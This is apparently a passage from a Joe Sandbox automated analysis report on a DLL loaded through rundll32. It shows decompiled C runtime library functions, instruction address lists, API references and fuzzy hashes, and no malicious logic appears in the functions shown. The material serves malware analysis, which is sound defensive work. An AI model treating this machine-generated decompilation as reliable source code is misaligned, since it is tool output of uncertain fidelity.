0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3
0x6e20f326
0x6e20f326
0x6e20f329
0x6e20f32d
0x6e20f331
0x6e20f33e
0x6e20f346
0x6e20f348
0x00000000
0x6e20f348
0x6e20f30f
0x6e20f30f
0x00000000
0x6e20f30f
0x6e20f30d
0x6e20f280
0x6e20f280
0x6e20f283
0x6e20f287
0x6e20f28b
0x6e20f298
0x6e20f2a0
0x6e20f2a2
0x00000000
0x6e20f2a2
0x6e20f269
0x6e20f269
0x00000000
0x6e20f269
0x6e20f267
0x6e20f1da
0x6e20f1da
0x6e20f1dd
0x6e20f1e1
0x6e20f1e5
0x6e20f1f2
0x6e20f1fa
0x6e20f1fc
0x00000000
0x6e20f1fc
0x6e20f1c3
0x6e20f1c3
0x00000000
0x6e20f1c3
0x6e20f1c1

APIs

__EH_prolog3.LIBCMT ref: 6E20F18A
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F194
int.LIBCPMT ref: 6E20F1AB

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E20F1CE
std::_Facet_Register.LIBCPMT ref: 6E20F1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F205
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F223

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
Instruction ID: 649ac8905262ea0ce9a5533c418bffb154387899aa8052279c3b24696cb4d61b
Opcode Fuzzy Hash: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
Instruction Fuzzy Hash: A511E37A90051DCFCF00DBE0C898AEEB77BBF84719F240909E4206B2D0DBB49A80C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E25621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E6E25621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6E246BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6E21F8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6E20DEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6E254640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6E20DEE1(_t100);
									goto L36;
								}
								_t62 = E6E254640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6E20DEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6E24F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6E2201B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6E254640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E24F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E2201B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6e256224
0x6e256225
0x6e256226
0x6e25622d
0x6e256232
0x6e256238
0x6e25623e
0x6e256244
0x6e256247
0x6e256247
0x6e25624a
0x6e25624c
0x6e25624c
0x6e25624a
0x6e25624e
0x6e256253
0x6e25625a
0x6e25625d
0x6e25625d
0x6e256279
0x6e25627f
0x6e256284
0x6e256417
0x6e25641b
0x6e25642a
0x6e25628a
0x6e25628a
0x6e25628d
0x6e256292
0x6e256296
0x6e2562ea
0x6e2562ea
0x6e2562ec
0x6e2562ee
0x6e25640c
0x6e25640c
0x6e25640e
0x6e25640f
0x00000000
0x6e256415
0x6e2562ff
0x6e256305
0x6e256307
0x00000000
0x00000000
0x6e25630d
0x6e25631f
0x6e256324
0x6e256328
0x00000000
0x00000000
0x6e256335
0x6e25636f
0x6e256372
0x6e256375
0x6e256377
0x6e256379
0x6e25637b
0x6e2563c7
0x6e2563c7
0x6e2563c9
0x6e2563c9
0x6e2563cb
0x6e256405
0x6e256406
0x00000000
0x6e25640b
0x6e2563df
0x6e2563e4
0x6e2563e6
0x00000000
0x00000000
0x6e2563ea
0x6e2563eb
0x6e2563ec
0x6e2563ef
0x6e25642b
0x6e25642e
0x6e2563f1
0x6e2563f1
0x6e2563f2
0x6e2563f2
0x6e2563ff
0x6e256401
0x6e256403
0x6e256434
0x00000000
0x00000000
0x00000000
0x00000000
0x6e256403
0x6e25637d
0x6e256380
0x6e256382
0x6e256384
0x6e256386
0x6e256389
0x6e25638e
0x6e2563a9
0x6e2563ab
0x6e2563b5
0x6e2563b7
0x6e2563b8
0x6e2563ba
0x00000000
0x00000000
0x6e2563bc
0x6e2563c2
0x6e2563c2
0x00000000
0x6e2563c2
0x6e256390
0x6e256392
0x6e256396
0x6e25639b
0x6e25639d
0x6e25639f
0x00000000
0x00000000
0x6e2563a1
0x00000000
0x6e2563a1
0x6e256337
0x6e25633c
0x00000000
0x00000000
0x6e256342
0x6e256344
0x00000000
0x00000000
0x6e25635b
0x6e256360
0x6e256364
0x00000000
0x00000000
0x00000000
0x6e25636a
0x6e25629d
0x6e25629f
0x6e2562a1
0x6e2562a9
0x6e2562c8
0x6e2562ca
0x6e2562d4
0x6e2562d6
0x6e2562d7
0x6e2562d9
0x00000000
0x00000000
0x6e2562df
0x6e2562e5
0x6e2562e5
0x00000000
0x6e2562e5
0x6e2562ad
0x6e2562b1
0x6e2562b6
0x6e2562ba
0x00000000
0x00000000
0x6e2562c0
0x00000000
0x6e2562c0

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E23F290,6E23F290,?,?,?,6E256470,00000001,00000001,C5E85006), ref: 6E256279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E256470,00000001,00000001,C5E85006,?,?,?), ref: 6E2562FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2563F9
__freea.LIBCMT ref: 6E256406

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

__freea.LIBCMT ref: 6E25640F
__freea.LIBCMT ref: 6E256434

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
Instruction ID: c0875fdc6f949447c3dd43aeb7607c4dbc10faf2bd5cc5e17263358a06b767a1
Opcode Fuzzy Hash: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
Instruction Fuzzy Hash: 4251C47262021BAFEB258FE4CD90EBB77ABEB44750F154669EC14DA240DF34DC61C690

Uniqueness

Uniqueness Score: -1.00%

Function 6E2423DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E6E2423DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6E254E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6E24C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6E24CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6E254E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6E24E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6E242188();
							asm("int3");
							E6E220990(_t97, _t123, 0x6e2c2bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6E2423DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6E24D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6E2550ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6E24F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6E2550ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6E242361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e2c52ec & 0x00000001;
												if(( *0x6e2c52ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E2425CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6E24CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6E242188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6E2209D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6E24E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

0x6e2423dd
0x6e2423dd
0x6e2423e2
0x6e2423e7
0x6e2423f7
0x6e2423f8
0x6e242401
0x6e242409
0x6e24240e
0x6e242411
0x6e242413
0x6e24241f
0x6e242429
0x6e24242c
0x6e24242d
0x6e24242f
0x6e242460
0x6e242461
0x6e242467
0x00000000
0x6e242431
0x6e24243b
0x6e242440
0x6e242443
0x6e242445
0x6e24245e
0x00000000
0x6e242447
0x6e242447
0x6e24244a
0x00000000
0x6e24244c
0x6e24244c
0x6e24244f
0x00000000
0x6e242451
0x00000000
0x6e242451
0x6e24244f
0x6e24244a
0x6e242445
0x6e242415
0x6e242415
0x6e242418
0x6e24246f
0x6e24246f
0x6e242470
0x6e242471
0x6e242472
0x6e242474
0x6e242479
0x6e242481
0x6e242489
0x6e24248d
0x6e242493
0x6e242494
0x6e242496
0x6e242498
0x6e2424a1
0x6e2424a6
0x6e2424ac
0x6e2424af
0x6e2424b2
0x6e2424b7
0x6e2424c6
0x6e2424cb
0x6e2424ce
0x6e2424d0
0x6e2424ea
0x6e2424f7
0x6e2424f9
0x6e2424fb
0x00000000
0x6e2424fd
0x6e2424fd
0x6e242500
0x6e242503
0x6e24250e
0x6e242511
0x6e242516
0x6e242519
0x6e24251b
0x6e24253e
0x6e24253e
0x6e242543
0x6e242548
0x6e242549
0x6e24254d
0x6e242553
0x6e242556
0x6e242558
0x6e24255c
0x6e242560
0x6e242566
0x6e24256b
0x6e24256c
0x6e242571
0x6e242571
0x6e242571
0x6e242560
0x6e242574
0x6e242577
0x6e24257e
0x6e242580
0x6e242587
0x6e24258d
0x6e24258f
0x6e242591
0x6e242595
0x6e242596
0x6e24259c
0x6e2425a2
0x6e2425a2
0x6e2425a2
0x6e2425a2
0x6e242596
0x6e24258f
0x6e242587
0x6e2425aa
0x6e2425ac
0x6e2425b3
0x6e2425b7
0x6e2425be
0x6e24251d
0x6e24251d
0x6e242520
0x6e242527
0x6e242527
0x6e242528
0x6e242529
0x6e24252a
0x6e24252b
0x00000000
0x6e242522
0x6e242522
0x6e242525
0x6e24252e
0x6e242530
0x00000000
0x6e242532
0x6e242533
0x00000000
0x6e242538
0x00000000
0x00000000
0x00000000
0x6e242525
0x6e242520
0x6e24251b
0x6e2424d2
0x6e2424d2
0x6e2424d5
0x6e2424dc
0x6e2424dc
0x6e2424dd
0x6e2424de
0x6e2424df
0x6e2424e0
0x6e2424e1
0x6e2424e1
0x6e2424d7
0x6e2424d7
0x6e2424da
0x00000000
0x00000000
0x6e2424da
0x6e2424e6
0x6e2424e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2424e8
0x6e24249a
0x6e24249a
0x6e24249a
0x6e2425ca
0x6e24241a
0x6e24241a
0x6e24241d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24241d
0x6e242418
0x6e2423e9
0x6e2423ee
0x6e24246b
0x6e24246e
0x6e24246e

APIs

__cftoe.LIBCMT ref: 6E242409
__cftoe.LIBCMT ref: 6E24243B

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: e4b542e468369e480a1d710993bb63c4644ecea5e299889bbd57a510be7afbc0
Instruction ID: b04693f176100f01ff8d8e5a36528e08456677cf2f239af8ae628ca8f22cae23
Opcode Fuzzy Hash: e4b542e468369e480a1d710993bb63c4644ecea5e299889bbd57a510be7afbc0
Instruction Fuzzy Hash: 8F51D8B790420EEBEB5C8BEACC51E9E77BFEB49725F104519E825E7181EF34D5008660

Uniqueness

Uniqueness Score: -1.00%

Function 6E2242C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E6E2242C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6e2c5090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6E2256A9(__eflags,  *0x6e2c5090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E2256E4(__eflags,  *0x6e2c5090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6E22B9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E2256E4(__eflags,  *0x6e2c5090, 0);
								} else {
									__eflags = E6E2256E4(__eflags,  *0x6e2c5090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E241DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e2242cf
0x6e2242e2
0x6e2242e9
0x6e2242ec
0x6e2242ef
0x6e224308
0x6e224308
0x6e2242f1
0x6e2242f1
0x6e2242f3
0x6e2242fd
0x6e224303
0x6e224304
0x6e224306
0x6e22430d
0x6e22430f
0x6e224316
0x6e22431a
0x6e22431c
0x6e224330
0x6e224330
0x6e224339
0x6e22431e
0x6e22432c
0x6e22432e
0x6e224342
0x6e224344
0x6e224344
0x00000000
0x00000000
0x00000000
0x6e22432e
0x6e224347
0x00000000
0x00000000
0x00000000
0x6e224306
0x6e2242f3
0x6e22434f
0x6e224359
0x6e2242d1
0x6e2242d3
0x6e2242d3

APIs

GetLastError.KERNEL32(00000001,?,6E223EDB,6E21FA25,6E21FD54,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E), ref: 6E2242D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2242E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2242FD
SetLastError.KERNEL32(00000000,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E22434F

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
